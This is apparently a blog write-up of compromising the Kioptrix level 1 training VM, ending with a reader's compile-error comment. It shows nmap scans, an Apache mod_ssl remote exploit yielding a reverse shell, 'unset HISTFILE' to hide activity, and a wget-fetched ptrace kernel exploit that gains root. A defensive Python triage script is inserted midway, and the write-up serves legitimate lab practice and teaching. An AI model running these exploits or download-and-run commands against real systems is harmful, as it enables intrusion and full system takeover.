I started by loading the VM onto the same network as my Kali Linux machine. Then I scanned the whole /24 with nmap, because I didn't know which IP the VM had been given.
root@kali:~# nmap -P0 192.168.1.0/24
(...)
Nmap scan report for 192.168.1.104
Host is up (0.00051s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
MAC Address: 00:0C:29:02:82:DB (VMware)
(...)
Once I had found the host, I ran a more thorough TCP SYN scan against it.
root@kali:~# nmap -sS -A 192.168.1.104
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-02 20:04 CET
Nmap scan report for 192.168.1.104
Host is up (0.00048s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after: 2010-09-26T08:32:06+00:00
|_ssl-date: 2013-11-02T20:07:02+00:00; +1h01m50s from local time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:02:82:DB (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
TRACEROUTE
HOP RTT ADDRESS
1 0.48 ms 192.168.1.104
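As an added illustration (not part of the original post), here is a small Python triage script that parses nmap normal output like the listing above and flags the legacy protocols (SSHv1, SSLv2, TRACE) and end-of-life software (Apache 1.x, OpenSSL 0.9.x) a defender would want to fix first; the sample input is constructed from the scan lines shown above.

```python
import re

# Constructed sample input: service lines and NSE notes taken from the
# nmap -sS -A output above, trimmed to the lines the checks look at.
SAMPLE_SCAN = """\
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
| sslv2:
| SSLv2 supported
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
NOTE_CHECKS = [("Server supports SSHv1", "SSHv1 enabled"), ("SSLv2 supported", "SSLv2 enabled"),
               ("risky methods: TRACE", "HTTP TRACE enabled")]  # NSE fragment -> finding

def parse_services(text):
    """Parse nmap normal output into open ports, each with its NSE note lines."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            services.append({"port": int(m.group(1)), "name": m.group(3),
                             "version": m.group(4).strip(), "notes": []})
        elif line.startswith("|") and services:
            # '|' and '|_' lines belong to the port entry directly above them
            services[-1]["notes"].append(line.lstrip("|_ ").strip())
    return services

def _ver(s):
    """'1.3.20' -> (1, 3, 20); the letter suffix in '0.9.6b' is ignored."""
    return tuple(int(x) for x in re.findall(r"\d+", s))

def triage(services):
    """Return (port, finding) pairs for legacy protocols and end-of-life software."""
    findings = []
    for s in services:
        port, ver, notes = s["port"], s["version"], " ".join(s["notes"])
        findings += [(port, finding) for needle, finding in NOTE_CHECKS if needle in notes]
        m = re.search(r"Apache httpd (\d+(?:\.\d+)+)", ver)
        if m and _ver(m.group(1)) < (2, 4):
            findings.append((port, f"Apache {m.group(1)} is end of life"))
        m = re.search(r"OpenSSL/(\d+(?:\.\d+)+[a-z]?)", ver)
        if m and _ver(m.group(1)) < (1, 0):
            findings.append((port, f"OpenSSL {m.group(1)} is end of life"))
    return findings
```

Feed it the output of a real `nmap -sS -A` run and every open port comes back with the items that need patching or disabling before anything else.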
From the scan output we can see a number of rather old services. I did a Google search for the Apache version and came across the following exploit:
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)
http://www.exploit-db.com/exploits/764/
It looked really promising, as the target had an SSL service running as well. After downloading it, I had to add two lines to the exploit code to get it to compile, and comment out a command that was not needed:
#include <openssl/rc4.h>
#include <openssl/md5.h>
// wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
Once it compiled, I looked up the target identifier I needed (we know the Apache version, and that the OS is Red Hat) and ran it, and voila... I got a reverse shell with limited privileges.
root@kali:~# ./OpenFuck | grep 1.3.20
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
root@kali:~# ./OpenFuck 0x6b 192.168.1.104
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp;
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ uname -r
uname -r
2.4.7-10
Now I only needed to get root. The original exploit wanted to download a ptrace exploit. After checking the Linux kernel version, I could see that it should work, so I downloaded the code and compiled it.
Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit
http://www.exploit-db.com/exploits/3/
I had to modify one line in the exploit in order to get it to work:
#include <linux/user.h>
to
#include <sys/user.h>
I copied the compiled binary into my own Apache web root and fetched it onto the victim machine with wget. After running it, I had root!
bash-2.05$ wget 192.168.1.17/p
wget 192.168.1.17/p
--15:42:35-- http://192.168.1.17/p
=> `p'
Connecting to 192.168.1.17:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 9,210
0K ........ 100% @ 691.86 KB/s
15:42:35 (691.86 KB/s) - `p' saved [9210/9210]
bash-2.05$ ls -l
ls -l
total 9
-rw-r--r-- 1 apache apache 9210 Nov 2 14:40 p
bash-2.05$ chmod 777 p
chmod 777 p
bash-2.05$ ./p
./p
[+] Attached to 5990
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cd /root
ls -l
total 2
-rw-r--r-- 1 root root 1303 Sep 26 2009 anaconda-ks.cfg
This is only my way of doing it; as this is the entry level, there may well be other ways to get in.
1 comment:
I get these errors when I try to compile it. I have added the headers to it and everything but it seems like my amazing C experience isn't helping ^,^ ...
764.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
764.c: In function ‘read_ssl_packet’:
764.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
^~~~~~~~~~~~~
764.c:847:19: note: each undeclared identifier is reported only once for each function it appears in
764.c: In function ‘get_server_hello’:
764.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
if (*(p++) != SSL2_MT_SERVER_HELLO) {
^~~~~~~~~~~~~~~~~~~~
764.c: In function ‘send_client_master_key’:
764.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
if (pkey->type != EVP_PKEY_RSA) {
^~
764.c: In function ‘get_server_verify’:
764.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
if (buf[0] != SSL2_MT_SERVER_VERIFY) {
^~~~~~~~~~~~~~~~~~~~~
764.c: In function ‘send_client_finished’:
764.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
buf[0] = SSL2_MT_CLIENT_FINISHED;
^~~~~~~~~~~~~~~~~~~~~~~
764.c: In function ‘get_server_finished’:
764.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)
if (buf[0] != SSL2_MT_SERVER_FINISHED) {